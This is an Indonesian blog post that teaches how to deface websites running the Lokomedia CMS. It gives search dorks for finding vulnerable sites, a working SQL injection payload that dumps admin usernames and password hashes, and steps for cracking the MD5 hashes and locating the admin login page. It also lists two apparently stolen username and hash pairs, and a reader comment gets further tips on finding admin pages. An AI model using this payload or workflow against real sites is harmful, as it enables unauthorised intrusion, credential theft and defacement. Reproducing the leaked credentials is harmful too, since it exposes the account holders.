DEFACE METODE SQL LOKOMEDIA


alo gaess..
kali ini gw mau kasih tutorial cara deface metode SQL Lokomedia.
ok langsung aja caranya.

- Bahan :
  • Dork :
  • - inurl:/statis-1-sejarah.html
    - inurl:/statis-1-profil.html
  • Exploit :
    'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
  • MD5 Decrypt tools, kalean bisa kunjungi disini

    - Tutorial :
    1. Dorking dengan dork yang sudah saya sediakan diatas.
    2. Pilih salah satu target kalian, dua aja gaapa kok xD.
    3. setelah itu masukkan Exploitnya ( diatas sudah ada ) di bagian url webnya.
  • Contoh : site.com/statis-1-profil.html
  • jadi : site.com/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
    4. setelah dimasukkan exploitnya, cek apakah vuln ato tidak, caranya ? cek gambar.

    5. nah kalo dah di cek, tekan tomblok CTRL + U nanti keluar view-source webnya, jadinya ntar kek gini.

    6. setelah ketemu user & pass admin loginnya,
  • user : tfrapi2016
  • pass : 01e34cc10e65e56cece50e196635f20a
  • user : orientasireza
  • pass : b88b8e489fd96ea5b815aea1f4b4a8ea
    7. kalian tinggal Decrypt passwordnya di MD5 Decrypt ( sudah saya sediakan diatas ).
    8. setelah di decrypt passwordnya kalian tinggal cari Admin Login nya.
    9. Untuk mencari admin login nya bisa dengan cara manual atau pakai tools.

    *terimakasih atas perhatiannya, mohon maaf kalo ada salah kata.
    ~Admin

    2 comments:

    1. kalo web yang "statis" gitu kok gak bisa di detect admin finder ya?

      ReplyDelete
      Replies
      1. coba skip cari target lain. atau ngga pergi ke halaman indexnya ( sebelumnya cari user dan passwordnya dulu. ) tekan Ctrl + U, cari yang berbau admin page seperti "/login" "/admin" "/masuk" dll.

        Delete

    Powered by Blogger.